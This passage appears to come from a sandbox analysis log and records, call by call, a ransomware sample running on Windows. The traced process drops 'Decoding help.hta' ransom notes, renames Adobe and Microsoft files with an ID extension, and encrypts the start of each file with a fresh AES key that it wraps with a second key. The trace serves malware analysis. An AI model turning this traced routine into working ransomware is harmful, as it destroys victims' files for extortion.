Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fr_fr\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x934 [0057.406] CreateFileMappingA (hFile=0x934, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x938 [0057.406] CryptAcquireContextA (in: phProv=0x2011fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2011fcec*=0x344a348) returned 1 [0060.133] CryptGenKey (in: hProv=0x344a348, Algid=0x6610, dwFlags=0x1, phKey=0x2011fce8 | out: phKey=0x2011fce8*=0x5db438) returned 1 [0060.133] CryptExportKey (in: hKey=0x5db438, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2011fbe4, pdwDataLen=0x2011fce4 | out: pbData=0x2011fbe4*, pdwDataLen=0x2011fce4*=0x2c) returned 1 [0060.133] MapViewOfFile (hFileMappingObject=0x938, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x2d0000 [0060.929] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2011fbe4*, pdwDataLen=0x2011fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2011fbe4*, pdwDataLen=0x2011fcf8*=0x100) returned 1 [0060.929] CryptEncrypt (in: hKey=0x5db438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x2011fce4*=0x140, dwBufLen=0x140 | out: pbData=0x2d0000*, pdwDataLen=0x2011fce4*=0x140) returned 1 [0060.929] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0060.931] CloseHandle (hObject=0x938) returned 1 [0060.931] CryptDestroyKey (hKey=0x5db438) returned 1 [0060.931] CryptReleaseContext (hProv=0x344a348, dwFlags=0x0) returned 1 [0060.931] SetFilePointerEx (in: hFile=0x934, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.931] WriteFile (in: hFile=0x934, lpBuffer=0x2011fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2011fcf8, lpOverlapped=0x0 | out: lpBuffer=0x2011fbe4*, lpNumberOfBytesWritten=0x2011fcf8*=0x100, lpOverlapped=0x0) returned 1 [0060.932] WriteFile (in: hFile=0x934, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2011fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x2011fcf8*=0x500, lpOverlapped=0x0) returned 1 [0060.932] CloseHandle (hObject=0x934) returned 1 [0060.932] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fr_FR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0060.932] FindNextFileW (in: hFindFile=0x6710b0, lpFindFileData=0x2011fd30 | out: lpFindFileData=0x2011fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 0 [0060.933] FindClose (in: hFindFile=0x6710b0 | out: hFindFile=0x6710b0) returned 1 Thread: id = 751 os_tid = 0x78c [0054.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*.*", lpFindFileData=0x2025fd30 | out: lpFindFileData=0x2025fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc6d8 [0059.393] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.393] FindNextFileW (in: hFindFile=0x10fbc6d8, lpFindFileData=0x2025fd30 | out: lpFindFileData=0x2025fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.393] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.393] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.393] FindNextFileW (in: hFindFile=0x10fbc6d8, lpFindFileData=0x2025fd30 | out: lpFindFileData=0x2025fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47dd5b4, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4a64ce1, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4a64ce1, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.393] lstrcpyW (in: lpString1=0x1101f668, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*.*" [0059.393] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*.*") returned 64 [0059.393] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\Decoding help.hta" [0059.393] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\decoding help.hta")) returned 0xffffffff [0059.393] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.635] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2025fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2025fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.636] CloseHandle (hObject=0x4bc) returned 1 [0060.636] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.869] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.869] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.869] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*.*" [0060.869] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*.*") returned 64 [0060.869] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui" [0060.869] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui" [0060.869] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.869] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.871] FindNextFileW (in: hFindFile=0x10fbc6d8, lpFindFileData=0x2025fd30 | out: lpFindFileData=0x2025fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe47dd5b4, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4a64ce1, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4a64ce1, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.871] FindClose (in: hFindFile=0x10fbc6d8 | out: hFindFile=0x10fbc6d8) returned 1 Thread: id = 752 os_tid = 0x64 [0054.492] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\*.*", lpFindFileData=0x2039fd30 | out: lpFindFileData=0x2039fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da438 [0056.838] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.838] FindNextFileW (in: hFindFile=0x5da438, lpFindFileData=0x2039fd30 | out: lpFindFileData=0x2039fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5f2920, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5f2920, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.838] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.838] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.838] FindNextFileW (in: hFindFile=0x5da438, lpFindFileData=0x2039fd30 | out: lpFindFileData=0x2039fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.838] lstrcpyW (in: lpString1=0x108f0608, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\*.*" [0056.838] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\*.*") returned 63 [0056.838] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Decoding help.hta" [0056.838] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hr_hr\\decoding help.hta")) returned 0xffffffff [0056.838] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hr_hr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xab8 [0058.310] WriteFile (in: hFile=0xab8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2039fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2039fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.310] CloseHandle (hObject=0xab8) returned 1 [0058.310] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.311] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.311] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.311] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\*.*" [0058.311] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\*.*") returned 63 [0058.311] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg" [0058.311] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg" [0058.311] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.311] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hr_hr\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hr_hr\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.312] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\hr_hr\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xab8 [0058.312] CreateFileMappingA (hFile=0xab8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xabc [0058.312] CryptAcquireContextA (in: phProv=0x2039fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2039fcec*=0x2aac51a8) returned 1 [0060.196] CryptGenKey (in: hProv=0x2aac51a8, Algid=0x6610, dwFlags=0x1, phKey=0x2039fce8 | out: phKey=0x2039fce8*=0x42cf818) returned 1 [0060.197] CryptExportKey (in: hKey=0x42cf818, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2039fbe4, pdwDataLen=0x2039fce4 | out: pbData=0x2039fbe4*, pdwDataLen=0x2039fce4*=0x2c) returned 1 [0060.197] MapViewOfFile (hFileMappingObject=0xabc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x4990000 [0061.171] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2039fbe4*, pdwDataLen=0x2039fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2039fbe4*, pdwDataLen=0x2039fcf8*=0x100) returned 1 [0061.173] CryptEncrypt (in: hKey=0x42cf818, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4990000*, pdwDataLen=0x2039fce4*=0x140, dwBufLen=0x140 | out: pbData=0x4990000*, pdwDataLen=0x2039fce4*=0x140) returned 1 [0061.177] UnmapViewOfFile (lpBaseAddress=0x4990000) returned 1 [0061.182] CloseHandle (hObject=0xabc) returned 1 [0061.182] CryptDestroyKey (hKey=0x42cf818) returned 1 [0061.182] CryptReleaseContext (hProv=0x2aac51a8, dwFlags=0x0) returned 1 [0061.182] SetFilePointerEx (in: hFile=0xab8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.182] WriteFile (in: hFile=0xab8, lpBuffer=0x2039fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2039fcf8, lpOverlapped=0x0 | out: lpBuffer=0x2039fbe4*, lpNumberOfBytesWritten=0x2039fcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.184] WriteFile (in: hFile=0xab8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2039fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x2039fcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.184] CloseHandle (hObject=0xab8) returned 1 [0061.184] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\hr_HR\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.184] FindNextFileW (in: hFindFile=0x5da438, lpFindFileData=0x2039fd30 | out: lpFindFileData=0x2039fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5f2920, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 0 [0061.184] FindClose (in: hFindFile=0x5da438 | out: hFindFile=0x5da438) returned 1 Thread: id = 753 os_tid = 0x40c [0054.493] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*.*", lpFindFileData=0x204dfd30 | out: lpFindFileData=0x204dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbc718 [0059.394] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.394] FindNextFileW (in: hFindFile=0x10fbc718, lpFindFileData=0x204dfd30 | out: lpFindFileData=0x204dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98159680, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98159680, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.394] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.394] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.394] FindNextFileW (in: hFindFile=0x10fbc718, lpFindFileData=0x204dfd30 | out: lpFindFileData=0x204dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8311729d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8311729d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8311729d, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.394] lstrcpyW (in: lpString1=0x244d8180, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*.*" [0059.394] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*.*") returned 64 [0059.394] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\Decoding help.hta" [0059.394] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\decoding help.hta")) returned 0xffffffff [0059.394] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.636] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x204dfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x204dfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.637] CloseHandle (hObject=0x4bc) returned 1 [0060.637] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.870] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.870] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.870] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*.*" [0060.870] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*.*") returned 64 [0060.870] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui" [0060.870] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui" [0060.870] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.870] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui" 